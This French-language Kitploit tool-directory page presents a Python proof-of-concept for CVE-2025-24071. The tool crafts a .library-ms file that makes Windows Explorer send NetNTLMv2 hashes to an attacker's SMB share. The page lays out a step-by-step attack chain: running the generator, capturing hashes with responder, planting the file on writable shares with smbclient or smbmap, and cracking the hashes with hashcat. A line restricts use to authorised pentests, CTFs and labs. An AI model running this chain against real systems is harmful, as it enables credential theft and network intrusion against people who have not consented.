Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/daemon-404/poc-cve-2025-24071
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationSécurité RéseauCTFTests d'IntrusionRed TeamingLabs et Pratique
GitHubdaemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

PoC Python pour CVE-2025-24071 qui fabrique un fichier .library-ms afin de forcer Windows Explorer à divulguer des hachages NetNTLMv2 via SMB pour capture et cassage.

Voir le dépôt
il y a 13h 56mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

❀ coerce-library

CVE-2025-24071 — coercition NTLM .library-ms (méthode SMB / TAR)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ Ce qu'il fait

Demande votre IP d'attaque et un nom de fichier, écrit un .library-ms pointant vers \\<IP>\share, et l'empaquette dans exploit.tar. Lorsqu'Explorer parcourt le dossier dans lequel le .library-ms isolé atterrit, il résout automatiquement ce chemin UNC et divulgue le NTLMv2 du compte à votre listener — aucun clic nécessaire.

⚠️ C'est le .library-ms isolé qui se déclenche — pas le .tar. Un .tar posé sur le partage est inerte ; Explorer ne parse pas les tarballs. Vous devez placer le .library-ms lui-même sur le partage en tant que fichier isolé. La façon de procéder dépend de l'outil (ci-dessous).


❀ L'exécuter

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ Ensuite

1) Écouter

root@kitploit:~
sudo responder -I tun0

2) Placer le .library-ms sur un partage accessible en écriture

smbclient — téléversez le .tar, extrayez-le côté serveur avec tar x (dépose le .library-ms isolé à côté) :

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — n'a pas d'étape d'extraction, donc téléversez le .library-ms isolé directement (téléverser le .tar ici ne fait rien — il ne peut pas le décompresser) :

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

Confirmez qu'il a atterri isolé sur le partage :

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) Cracker le NTLMv2 capturé

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ usage en test d'intrusion autorisé / CTF / labo uniquement ☧

Télécharger l’outil